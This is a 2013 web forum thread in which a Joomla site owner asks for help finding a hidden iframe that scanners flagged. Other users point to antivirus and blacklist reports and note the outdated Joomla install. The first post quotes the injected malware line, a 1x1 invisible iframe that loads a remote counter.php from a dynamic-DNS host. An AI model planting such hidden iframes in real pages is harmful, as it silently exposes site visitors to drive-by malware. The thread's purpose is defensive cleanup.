Author Topic: MW:IFRAME:HD202 for my website (Read 3411 times)

romulus2013 · « **on:** November 04, 2013, 02:54:59 PM »

Hi all,

Avast reported a JS injected files, i scanned my website http://showroom360.net with http://sitecheck.sucuri.net/results/showroom360.net and it reports that there's a hidden frame :

Code: [Select]

Details: http://sucuri.net/malware/entry/MW:IFRAME:HD202
<iframe src="http://kifacnfor.sytes.net/dezit/counter.php" width=1 height=1 style="visibility: hidden">

and

Code: [Select]

Known javascript malware. 
Details: http://sucuri.net/malware/malware-entry-mwjsanon7
<iframe src="http://kifacnfor.sytes.net/dezit/counter.php" width=1 height=1 style="visibility: hidden"></iframe><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr-fr" lang="fr-fr" > <script type="text/javascript">var _gaq = _gaq || [];

It's a Joomla website, i searched in files but didn't find this iFrame. Can you help please to locate it ?

Thanks for your help.

Secondmineboy · « **Reply #1 on:** November 04, 2013, 05:18:37 PM »

AVG detected some HTML:Framer during the last 30 days: http://www.avgthreatlabs.com/website-safety-reports/domain/showroom360.net/

Blacklisted by Kaspersky on Virustotal: https://www.virustotal.com/en/url/7c94eff79d91917d7edee8899661e3af977caab90522048f267351094871173c/analysis/1383581857/

polonus · « **Reply #2 on:** November 04, 2013, 10:17:19 PM »

Site has been cleansed see no flags there now. All seems fine.

Only code hick-up to look into:
showroom360 dot net/components/rsform/assets/js/script.js benign
[nothing detected] (script) showroom360 dot net/components/rsform/assets/js/script.js
status: (referer=showroom360 dot net/)saved 5307 bytes 90914dc644a7e591d8037b3703450d22f410897d
info: ActiveXDataObjectsMDAC detected Microsoft.XMLHTTP
info: [decodingLevel=0] found JavaScript
suspicious:

polonus

romulus2013 · « **Reply #3 on:** November 07, 2013, 09:39:39 AM »

thx for your answers, what i can't understand why there is always a malware detected by Sucuri : http://sitecheck.sucuri.net/results/showroom360.net ?

Pondus · « **Reply #4 on:** November 07, 2013, 09:45:02 AM »

your Sucuri report was 2 days old http://sitecheck.sucuri.net/results/showroom360.net

but still outdated jomla....

Author Topic: MW:IFRAME:HD202 for my website (Read 3411 times)

romulus2013

MW:IFRAME:HD202 for my website

Secondmineboy

Re: MW:IFRAME:HD202 for my website

polonus

Re: MW:IFRAME:HD202 for my website

romulus2013

Re: MW:IFRAME:HD202 for my website

Pondus

Re: MW:IFRAME:HD202 for my website